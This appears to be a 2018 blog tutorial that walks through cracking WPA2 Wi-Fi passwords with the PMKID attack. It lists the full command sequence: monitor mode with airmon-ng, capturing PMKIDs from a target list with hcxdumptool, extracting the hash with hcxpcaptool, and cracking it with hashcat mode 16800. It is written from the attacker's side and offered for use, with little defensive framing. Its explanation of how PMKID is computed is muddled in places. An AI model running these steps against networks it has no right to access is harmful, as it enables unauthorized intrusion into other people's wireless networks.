How to Crack WPA2 without handshake, newly discovered method (PMKID)

by hash3liZer . 10 August 2018

How to Crack WPA2 without handshake, newly discovered method (PMKID)

A new vulnerability has been recently exposed in WPA2 by the developer of famous hashcat tool which allows the attacker to get the Pairwise Master Key ID (PMK) directly from the first message of a handshake. i.e. without the need for a client to interact with Access Point. This simply skips the process of manually computing the PMK. Hence, speeding up the process a bit and simply emits the need of listening on to a client for the handshake.

Here's how the Pairwise Master Key ID is computed. Basically, it's the concatenation of PMK key, PMK secret key, Mac of AP and MAC of STA.

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

While in this case, the computing process is rather simple. The former method of cracking requires a valid handshake, comprised of at least the first two EAPOL messages to compute the MIC code which then has to be matched at second or fourth frame (relatively different concepts). Here's the python version of the previous method:

PMK = PBKDF2("PASSWORD", "ESSID", 4096).read(32)
PTK = PRF512(PMK, "Pairwise key expansion", DATA)
MIC = hmac.new(ptk__[0:16], payload, hashlib.md5).digest()  # For WPA
MIC = hmac.new(ptk__[0:16], payload, hashlib.sha1).digest()  # For WPA2

This newly discovered method of WPA2 cracking has already been added to the tool hashcat by Jens Steube. So, we could now literally test it on wireless networks. I've also checked up with some other routers. WPA seems immune to this attack because it doesn't rely on the Robust Security Network (RSN) protocol. I am not so sure about hotspot networks but I've run tests on two hotspots and got no result.

Prerequisities

Let's make it up. You would need a Kali Machine and wireless Card that supports packet injection and monitor mode. Tested with Alpha from TP-Link, worked fine. A vulnerable WPA2 router. Here's a picture of EAPOL from a vulnerable router:

vulnerable router

STEP 1

Setup environment.

Put your wireless card in monitor mode:

$ airmon-ng start wlan1

Next thing is, we need some tools from github. The list is:

  • hashcat >= 4.2.0
  • hcxtools
  • hcxdumptool

Installation:

Update the environment first and install the dependencies:

$ apt-get update
$ apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev

If you are on Kali, hastcat would already be in repository packages. You would need to first uninstall it and then install the latest version from github:

$ apt-get remove hashcat
$ git clone https://github.com/hashcat/hashcat.git
$ cd hashcat/
$ git submodule update --init
$ sudo make && sudo make install
hashcat

Then make sure, you have the version >= 4.2.0 by using the command:

$ hashcat --version
hashcat version

Now, clone hcxtools from github and compile the binaries:

$ git clone https://github.com/ZerBea/hcxtools.git
$ cd hcxtools
$ sudo make && sudo make install
hcxtools installation

Then at last, clone hcxdumptool and compile the binaries:

$ git clone https://github.com/ZerBea/hcxdumptool.git
$ cd hcxdumptool/
$ sudo make && sudo make install
hcxdump installation

STEP 2

Get the PMKID

This step is about collecting the PMKID. Compile a list of your targets. Scan your area with airodump:

airodump-ng wlan1mon
unknown network

Now, create a list of your targets by writing the MAC address of target to a file:

mac address noting

Then start hcxdumptool:

$ hcxdumptool -i wlan1mon --enable_status --filterlist=targets.lst --filtermode=2 -o capturefile.cap

This will try to make the AP transmit the first EAPOL frame which then will be used to acquire the PMKID from the RSN element layer. Just keep it running until you get the message that PMKID is captured. Here's what it would look like:

[11:17:13 - 011] 001825c88749 -> fcc2336e8b64 [FOUND AUTHORIZE \
HANDSHAKE, EAPOL TIMEOUT 3605]
[11:17:13 - 011] 001825c88749 -> fcc2336e8b64 [FOUND PMKID]

STEP 3

Get the PMKID hash

As of now, we have the captured file. Now, we need to extract the PMKID hash from the capturefile.cap. Use hcxpcaptool for this:

$ hcxpcaptool -z pmkidhash capturefile.cap

Output:

added hashes

Now, check the added hashes:

$ cat pmkidhash
added hashes

STEP 4

Crack the Code

We have the PMKID hash. All is need now to crack it down using hashcat. Now, run the hashcat with the following syntax:

$ hashcat -m 16800 --force pmkidhash [wordlist]

This would start cracking the password. A successful attack would go like this:

hashcat cracked

Conclusion

Today, we saw a new way of cracking WPA2, this time not by computing the MIC but by computing the PMKID. This emits the need of generating a valid handshake and hence fast up the whole process especially for long range networks. Most of the time, the problem ends up with clients because there are not enough clients or maybe you are not close enough. In that case, this new way of cracking WPA2 would be rather useful and awesome.